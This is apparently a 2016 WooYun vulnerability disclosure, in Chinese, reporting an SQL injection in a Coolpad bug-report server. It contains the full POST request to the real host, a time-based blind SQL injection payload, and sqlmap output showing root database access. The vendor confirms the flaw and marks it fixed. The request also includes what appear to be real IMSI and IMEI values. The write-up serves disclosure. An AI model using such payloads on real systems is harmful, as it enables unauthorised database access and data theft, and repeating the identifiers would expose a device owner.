当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185947

漏洞标题:宇龙(酷派)某站点存在SQL注入漏洞

相关厂商:yulong.com

漏洞作者: 路人甲

提交时间:2016-03-18 09:39

修复时间:2016-05-02 15:13

公开时间:2016-05-02 15:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-28: 细节向核心白帽子及相关领域专家公开
2016-04-07: 细节向普通白帽子公开
2016-04-17: 细节向实习白帽子公开
2016-05-02: 细节向公众公开

简要描述:

详细说明:

一天无聊对手机进行抓包,发现手机会上传一些报告,然后有了这次的注入点
POST注入点:

POST http://userreport.yulong.com/usercontrol.php HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=----9527bugreport20060606
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; Coolpad 9999 Build/JZO54K)
Host: userreport.yulong.com
Accept-Encoding: gzip
Content-Length: 1613
------9527bugreport20060606
Content-Disposition: form-data; name="BuildType"
user
------9527bugreport20060606
Content-Disposition: form-data; name="Software"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="CoolCloudID"
------9527bugreport20060606
Content-Disposition: form-data; name="TimeMark"
2016-03-15 19:43:03
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI"
460031266335918
------9527bugreport20060606
Content-Disposition: form-data; name="SN"
999902133505532
------9527bugreport20060606
Content-Disposition: form-data; name="VersionType"
LC
------9527bugreport20060606
Content-Disposition: form-data; name="BugType"
get_reply
------9527bugreport20060606
Content-Disposition: form-data; name="Active"
0
------9527bugreport20060606
Content-Disposition: form-data; name="IMEI"
861111024811666
------9527bugreport20060606
Content-Disposition: form-data; name="CpbInfo"
046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI2"
204043161156949
------9527bugreport20060606
Content-Disposition: form-data; name="ProductName"
Coolpad 9999
------9527bugreport20060606
Content-Disposition: form-data; name="Describe"
null
------9527bugreport20060606
Content-Disposition: form-data; name="IMEID"
99000455490031
------9527bugreport20060606
Content-Disposition: form-data; name="Version"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="VersionNameSelf"
2013.05.29_09.40_VER_2013.07.08_11:20:05


payload:

---
Parameter: MULTIPART TimeMark ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ------9527bugreport20060606
Content-Disposition: form-data; name="BuildType"
user
------9527bugreport20060606
Content-Disposition: form-data; name="Software"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="CoolCloudID"
------9527bugreport20060606
Content-Disposition: form-data; name="TimeMark"
2016-03-15 19:43:03' AND (SELECT * FROM (SELECT(SLEEP(5)))tqEy) AND 'MhDd'='MhDd
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI"
460031266335918
------9527bugreport20060606
Content-Disposition: form-data; name="SN"
999902133505532
------9527bugreport20060606
Content-Disposition: form-data; name="VersionType"
LC
------9527bugreport20060606
Content-Disposition: form-data; name="BugType"
get_reply
------9527bugreport20060606
Content-Disposition: form-data; name="Active"
0
------9527bugreport20060606
Content-Disposition: form-data; name="IMEI"
861111024811666
------9527bugreport20060606
Content-Disposition: form-data; name="CpbInfo"
046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI2"
204043161156949
------9527bugreport20060606
Content-Disposition: form-data; name="ProductName"
Coolpad 9999
------9527bugreport20060606
Content-Disposition: form-data; name="Describe"
null
------9527bugreport20060606
Content-Disposition: form-data; name="IMEID"
99000455490031
------9527bugreport20060606
Content-Disposition: form-data; name="Version"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="VersionNameSelf"
2013.05.29_09.40_VER_2013.07.08_11:20:05
---
[10:09:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.4, PHP 5.4.13
back-end DBMS: MySQL 5.0.12


漏洞证明:

当前数据库及当前用户:

current user:    'root@%'
current database:    'db_yl_user_report'


root用户 貌似可以干好多事哦
查看所有的数据库
--dbs

[11:10:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.4, PHP 5.4.13
back-end DBMS: MySQL 5.0.12
[11:10:14] [INFO] fetching database names
[11:10:14] [INFO] fetching number of databases
[11:10:14] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:10:14] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                                                                    
[11:10:23] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions 
[11:10:53] [WARNING] turning off pre-connect mechanism because of connection time out(s)
13
[11:12:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                                                                    
information


好吧 太慢了就不跑了 这已经足以证明漏洞的存在了

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-03-18 15:13

厂商回复:

感谢提供,已转给业务方处理。另:酷派已建立SRC,欢迎到SRC提交漏洞,奖励丰厚。
http://

最新状态:

2016-03-18:地址被过滤了。http://security.coolpad.com

2016-03-18:漏洞已修复